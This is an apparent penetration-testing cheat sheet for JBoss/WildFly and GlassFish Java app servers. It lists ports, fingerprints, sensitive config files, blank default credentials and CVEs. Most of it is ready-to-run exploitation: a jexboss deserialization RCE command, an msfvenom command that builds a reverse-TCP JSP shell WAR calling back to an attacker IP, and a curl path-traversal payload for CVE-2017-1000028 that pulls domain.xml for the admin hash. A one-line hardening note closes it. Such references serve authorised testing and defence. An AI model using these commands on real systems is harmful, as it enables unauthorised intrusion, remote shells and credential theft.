JBoss / GlassFish | KagisoSec

Ports

Port	Proto	Notes
`8080`	tcp	JBoss/GlassFish HTTP app port
`8443`	tcp	GlassFish HTTPS
`4848`	tcp	GlassFish admin console
`9990`	tcp	WildFly/JBoss management

Fingerprint

JBoss: /jmx-console, /web-console, /invoker/JMXInvokerServlet
GlassFish: 'GlassFish Server' banner, admin console on 4848

Key files

Path	Holds	Sensitive
`standalone/configuration/standalone.xml`	JBoss/WildFly datasource creds, mgmt users	sensitive
`glassfish/domains/domain1/config/domain.xml`	GlassFish admin/datasource config	sensitive

Default / weak creds

GlassFish admin / (blank) on old installs

Known CVEs

CVE	Impact
CVE-2017-12149	JBoss unauthenticated Java deserialization RCE (ReadOnlyAccessFilter)
CVE-2017-1000028	GlassFish path traversal (read domain.xml / arbitrary files)

Exploitation primitives

JBoss: jexboss / JMXInvokerServlet deserialization for unauth RCE, or deploy a WAR via the JMX console
GlassFish: log in to 4848, deploy a malicious .war, browse to it for a JSP shell
GlassFish traversal (CVE-2017-1000028) reads domain.xml for the admin hash

Overview

JBoss/WildFly and GlassFish are Java app servers. The reliable paths are deserialization (JBoss) and WAR deployment through the admin console (both).

JBoss deserialization (jexboss)

python3 jexboss.py -host http://<TARGET>:8080

Deploy a malicious WAR

Build a JSP webshell WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f war -o shell.war

GlassFish — deploy it via the admin console (4848) or autodeploy, then browse:

curl "http://<TARGET>:8080/shell/"

GlassFish file read (CVE-2017-1000028)

curl --path-as-is "http://<TARGET>:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/domain.xml"

Hardening

Remove the JMX/web consoles, patch the deserialization filters, set a strong admin password, and disable remote WAR deployment.